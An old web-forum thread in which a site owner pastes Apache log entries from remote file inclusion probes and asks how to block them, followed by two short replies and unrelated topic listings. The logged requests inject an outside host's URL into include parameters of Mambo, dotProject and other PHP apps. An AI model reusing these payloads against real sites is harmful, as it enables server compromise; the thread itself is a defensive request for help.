PHP security

Hi I am a newb to all this so please ignore my ignorance...

This morning I have discovered someone has tried to exploit my site. The information is below.. my index.php file contains a flash file which has a form, the PHP for which is in a separate file named 'feedback.php.

Basically I want to stop these exploits and I wonder how I can do it?? I have asked on a few forums but nothing is working!! It seems I need to somehow restrict access or redirect bad requests.. please help I can;t afford to be blacklisted for this..

Many Thanks

Expand|Select|Wrap|Line Numbers

 
3.11.34 - - [20/May/2008:01:14:38 +0200] "GET /admin/business_inc/saveserver.php?thisdir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

3.11.34 - - [20/May/2008:01:14:38 +0200] "GET /dotproject/includes/db_adodb.php?baseDir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

3.11.34 - - [20/May/2008:01:14:39 +0200] "GET /interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

3.11.34 - - [20/May/2008:01:14:40 +0200] "GET /saveserver.php?thisdir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

3.11.34 - - [20/May/2008:01:14:41 +0200] "GET /index.php?page=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008

3.11.34 - - [20/May/2008:01:14:41 +0200] "GET /index.php?x=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008

36.241.81 - - [20/May/2008:02:02:09 +0200] "HEAD / HTTP/1.1" 200 0

80.12.13 - - [20/May/2008:02:18:13 +0200] "GET / HTTP/1.0" 200 3983

3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008

3.11.34 - - [20/May/2008:02:22:03 +0200] "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

3.11.34 - - [20/May/2008:02:22:03 +0200] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

36.241.81 - - [20/May/2008:03:03:55 +0200] "HEAD / HTTP/1.1" 200 0

3.11.34 - - [20/May/2008:03:13:48 +0200] "GET /phplive/help.php?css_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

3.11.34 - - [20/May/2008:03:13:49 +0200] "GET /webcalendar/tools/send_reminders.php?includedir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

May 20 '08 #1

Subscribe Post Reply

2358

TheServant

1,168

Expert 1GB

We need to see you code, and for a whole site, that is hard. Where do you think they're getting in from? Post that code if you have an idea.

May 20 '08 #2

dlite922

1,584

Expert 1GB

Hi I am a newb to all this so please ignore my ignorance...

This morning I have discovered someone has tried to exploit my site. The information is below.. my index.php file contains a flash file which has a form, the PHP for which is in a separate file named 'feedback.php.

Basically I want to stop these exploits and I wonder how I can do it?? I have asked on a few forums but nothing is working!! It seems I need to somehow restrict access or redirect bad requests.. please help I can;t afford to be blacklisted for this..

Many Thanks

Expand|Select|Wrap|Line Numbers

209.3.11.34 - - [20/May/2008:01:14:38 +0200] "GET /admin/business_inc/saveserver.php?thisdir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

209.3.11.34 - - [20/May/2008:01:14:38 +0200] "GET /dotproject/includes/db_adodb.php?baseDir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

209.3.11.34 - - [20/May/2008:01:14:39 +0200] "GET /interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

209.3.11.34 - - [20/May/2008:01:14:40 +0200] "GET /saveserver.php?thisdir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

209.3.11.34 - - [20/May/2008:01:14:41 +0200] "GET /index.php?page=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008

209.3.11.34 - - [20/May/2008:01:14:41 +0200] "GET /index.php?x=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008

65.36.241.81 - - [20/May/2008:02:02:09 +0200] "HEAD / HTTP/1.1" 200 0

81.80.12.13 - - [20/May/2008:02:18:13 +0200] "GET / HTTP/1.0" 200 3983

209.3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

209.3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008

209.3.11.34 - - [20/May/2008:02:22:03 +0200] "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

209.3.11.34 - - [20/May/2008:02:22:03 +0200] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

65.36.241.81 - - [20/May/2008:03:03:55 +0200] "HEAD / HTTP/1.1" 200 0

209.3.11.34 - - [20/May/2008:03:13:48 +0200] "GET /phplive/help.php?css_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

209.3.11.34 - - [20/May/2008:03:13:49 +0200] "GET /webcalendar/tools/send_reminders.php?includedir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

Haven't seen it in a long time, but is that the Apache log? I don't get it...is this your site? http://82.127.69.88/

or is that the hacker's/exploiter's site?

I don't know how you're gonna get black listed if its a contact form that sends email to you? You're not an email server.

Let me know if i've got this all wrong.

Dan

May 21 '08 #3

Similar topics

row level security

by: robert | last post by:

well, talk about timely. i'm tasked to implement a security feature, and would rather do so in the database than the application code. the application is generally Oracle, but sometimes DB2. ...

DB2 Database

116

Security - more complex than I thought

by: Mike MacSween | last post by:

S**t for brains strikes again! Why did I do that? When I met the clients and at some point they vaguely asked whether eventually would it be possible to have some people who could read the data...

Microsoft Access / VBA

Error using WS-Security

by: Ashish | last post by:

Hi Guys I am getting the following error while implementing authentication using WS-security. "Microsoft.Web.Services2.Security.SecurityFault: The security token could not be authenticated...

C# / C Sharp

Error while executing .NET remoing security dlls

by: prithvi g via .NET 247 | last post by:

Hi I am a newbie to .NET remoting, I am trying to implementauthorization using SSPI example provided by Michael Barnett. Ihave included the required dll(Microsoft.Samples.Security.SSPI.dll...

C# / C Sharp

Design Issue: Separating Application Security Model from the Application (Custom or User) Controls

by: Earl Teigrob | last post by:

Background: When I create a ASP.NET control (User or custom), it often requires security to be set for certain functionality with the control. For example, a news release user control that is...

ASP.NET

IIS / Web Services Security threats

by: Magdelin | last post by:

Hi, My security team thinks allowing communication between the two IIS instances leads to severe security risks. Basically, we want to put our presentation tier on the perimeter network and the...

.NET Framework

Referenced security token could not be retrieved

by: Jay C. | last post by:

Jay 3 Jan. 11:38 Optionen anzeigen Newsgroups: microsoft.public.dotnet.framework.webservices.enhancements Von: "Jay" <p.brunm...@nusurf.at> - Nachrichten dieses Autors suchen Datum: 3 Jan...

.NET Framework

FxCop App Security

by: Velvet | last post by:

I ran FxCop on one of the components for my web site and the security rules what me to add " tags like the ones listed below: This breaks my ASP.NET application. So my question is,...

ASP.NET

Code Access Security - General Question

by: Jeremy S. | last post by:

..NET's code Access Security enables administrators to restrict the types of things that a .NET application can do on a local computer. For example, a ..NET Windows Forms application can be...

.NET Framework

Embedding Windows Form Control to ASP .NET Security Problem

by: Budhi Saputra Prasetya | last post by:

Hi, I managed to create a Windows Form Control and put it on my ASP .NET page. I have done the suggestion that is provided by modifying the security settings. From the stack trace, I would...

ASP.NET

How to turn on java script in a villaon keypad mobile phone

by: Charles Arthur | last post by:

How do i turn on java script on a villaon, callus and itel keypad mobile phone

Java

Batch import of multiple excel files into the database

by: ryjfgjl | last post by:

If we have dozens or hundreds of excel to import into the database, if we use the excel import function provided by database editors such as navicat, it will be extremely tedious and time-consuming...

Data Management

Merging data from multiple Excel files

by: ryjfgjl | last post by:

In our work, we often receive Excel tables with data in the same format. If we want to analyze these data, it can be difficult to analyze them because the data is spread across multiple Excel files...

Data Management

Migrating Website to Cloud - Emmanuel Katto

by: emmanuelkatto | last post by:

Hi All, I am Emmanuel katto from Uganda. I want to ask what challenges you've faced while migrating a website to cloud. Please let me know. Thanks! Emmanuel

General

Navigating the Data Structures and Algorithms (DSA)

by: BarryA | last post by:

What are the essential steps and strategies outlined in the Data Structures and Algorithms (DSA) roadmap for aspiring data scientists? How can individuals effectively utilize this roadmap to progress...

Algorithms / Advanced Math

How to build RAID in BIOS?

by: Hystou | last post by:

There are some requirements for setting up RAID: 1. The motherboard and BIOS support RAID configuration. 2. The motherboard has 2 or more available SATA protocol SSD/HDD slots (including MSATA, M.2...

Computer Hardware

What is ONU?

by: marktang | last post by:

ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However,...

General

Maximizing Business Potential: The Nexus of Website Design and Digital Marketing

by: jinu1996 | last post by:

In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven...

Online Marketing

The easy way to turn off automatic updates for Windows 10/11

by: Hystou | last post by:

Overview: Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows...

Windows Server